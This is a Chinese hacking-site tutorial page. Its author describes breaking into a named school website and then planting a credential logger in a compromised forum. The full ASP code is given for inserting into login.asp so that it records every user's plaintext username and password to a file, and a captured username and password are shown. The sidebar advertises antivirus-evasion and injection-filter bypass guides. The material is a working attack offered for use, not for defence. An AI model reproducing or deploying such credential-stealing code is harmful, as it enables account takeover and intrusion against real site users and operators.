首 页文章中心黑客工具黑吧学院技术论坛安全培训免费频道最近更新瑞星在线杀毒黑吧百度繁體中文
  设为首页
加入收藏
发布作品
   
栏目导航
· 入侵检测 · 论坛分析
· 新手上路 · 脚本入侵
· 本站原创 · 会员作品
本类热门
· VB打造简单免杀下载者...
· 破解王者舞间道外挂
· 另类破解股市小助理
· 易语言免杀鸽子表面过...
· 黑防鸽子轻松免杀过no...
· GG24小时收录新站
· 免费申请QQ无限邮箱
· 上兴2008上线二种方法...
· 突破Asp防注入系统(2动...
· 双ADSL两线--多ADSL上...
· 网吧中诺德尔快鹿使用...
· 命令做全免杀(过所有杀...
入侵时无奈的选择
运行环境 Win9X/Win2000/WinXP/Win2003/
整理时间 2007-4-15 1:18:55
软件星级
软件语言 简体中文
软件类型 综合教程
授权方式 免费教程
软件大小 14.1 MB
相关连接 hack58fb#126.com   官方主页   没有预览图片 [收 藏]
下载统计
解压密码 本站默认解压密码:www.hack58.com
S 软件简介


————————————————————————————
先做广告吧.
黑客动画吧,不错的网站....
www.hack58.com
————————————————————————————
         当入侵陷入绝境中无奈的一种选择
本文提供的仅仅是一种思路,陷入绝境时可以用一下。
由于某些原因,想入侵这个网站。http://xdjx.nnsky.com/
探测结果:
主站可以注入,但只能得到论坛前台密码,无用。
有个ewebeditor,可下数据库,但无法破解得到管理密码,无用。
bbsxp的论坛,没有什么明显的漏洞了。所以就这么一直搁着。直到有一天浏览其他网站时,都是同一个学校的。
版主:雨中阳
  加为好友  发送讯息
 用户等级 管理员
同一个人,呵呵。有希望了。我们可以入侵这个论坛,得到他的密码。shell已经得到了。
但通过查看数据库,发现雨中阳 的密码比较变态,没办法了吗?
无奈,既然这样,既然他是斑竹,那他一定要经常登陆论坛了,所以我们可以在login.asp中插入代码,得到他的明文。
我已经查入好了。就是下面这段。

<%
dim fso
dim file
dim file2
dim filesize
dim file3
set fso=server.createobject("s cripting.FileSystemObject")
If Request("u")="del" Then
set file=fso.OpenTextFile("D:\web\union\shetuan\bbs\info.txt",2,True)
file.WriteLine ""
End If
If fso.FileExists("D:\web\union\shetuan\bbs\info.txt") Then
set file=fso.OpenTextFile("D:\web\union\shetuan\bbs\info.txt",8,True)
Else
set file=fso.CreateTextFile("D:\web\union\shetuan\bbs\info.txt")
end if
file.WriteLine "username:"+Request.form("username")
file.WriteLine "password:"+Request.form("password")
file.close
set file3=fso.GetFile("D:\web\union\shetuan\bbs\info.txt")
filesize=file3.size
if filesize>200000 then
set file2=fso.OpenTextFile("D:\web\union\shetuan\bbs\info.txt",2,True)
file2.WriteLine ""
file2.close
end if

set file=nothing
set file2=nothing
set filesize=nothing
set fso=nothing
%>
就是这段,其中两点注意:
D:\web\union\shetuan\bbs,你自己的路径
file.WriteLine "username:"+Request.form("username")
file.WriteLine "password:"+Request.form("password")
username,password,也要看你自己的情况。
我已经插入好了 。实验一下。什么也没有呢。
我还下载呢,卡~
我们实验下,卡啊

username:tiandi
password:00123456

,好成功了,我们现在要做的就是等他登陆了。
你也可以去他的网站去刺激下他啊。呵呵,这就不演示了。

——————————————————————
希望黑吧管理员可以给我个邀请码,很希望在黑吧学习,
我的邮箱:shixiemodi@163.com
谢谢。
————————————————————————

S 下载地址

电信下载
网通下载

 

 
S 相关软件
 入侵时无奈的选择最新动画 入侵时无奈的选择最新版
入侵时无奈的选择最新免杀 入侵时无奈的选择升级版
 入侵时无奈的选择破解版 入侵时无奈的选择注册机
入侵时无奈的选择免费版 入侵时无奈的选择汉化补丁
S 下载说明
为了达到最快的下载速度,推荐使用[讯雷]下载本站软件。
请一定升级到最新版[WinRAR3.5]才能正常解压本站提供的软件!
如果您发现该软件不能下载,请点击报告错误谢谢!
站内提供的所有软件包含破解及注册码均是由网上搜集,若侵犯了你的版权利益,敬请来信通知我们!
 
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 网站导航 - 作品发布
互联网备案登记:粤ICP备05008775号
友情提示:浏览本站,请使用IE6.0浏览,并将分辩率设置为1024*768 为佳
Copyright © 2002-2005 Hack58.Com. All Rights Reserved .